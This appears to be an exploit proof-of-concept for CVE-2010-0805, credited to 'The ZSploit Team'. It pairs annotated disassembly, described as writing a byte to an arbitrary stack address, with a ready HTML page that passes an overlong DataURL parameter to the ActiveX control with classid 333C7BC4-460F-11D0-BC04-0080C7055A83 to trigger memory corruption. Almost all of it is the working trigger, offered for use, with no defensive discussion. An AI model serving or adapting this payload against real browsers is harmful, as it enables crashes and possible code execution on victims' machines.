|
# CVE : CVE-2010-0805
<!-- .text:600058F7 and [ebp+pv], 0 .text:600058FE lea eax, [ebp+pv] .text:60005904 push eax ; unsigned __int16 ** .text:60005905 push dword ptr [ebx+10h] ; struct IOleClientSite * .text:60005908 call GetHostURL(IOleClientSite *,ushort * *) .text:6000590D mov eax, [ebp+var_218] .text:60005913 push [ebp+pv] ; pv .text:60005919 mov [ebp+eax+var_204], 0 .text:60005921 mov eax, [ebp+var_21C] ; length of the DataURL param .text:60005927 mov [ebp+eax+var_104], 0 ; write one byte to arbitrary stack address --> <html> <title>Trigger for ZDI-10-034 by ZSploit.com</title> <head> </head> <body> <object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"> <param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/> </object> </body> </html>
The ZSploit Team
|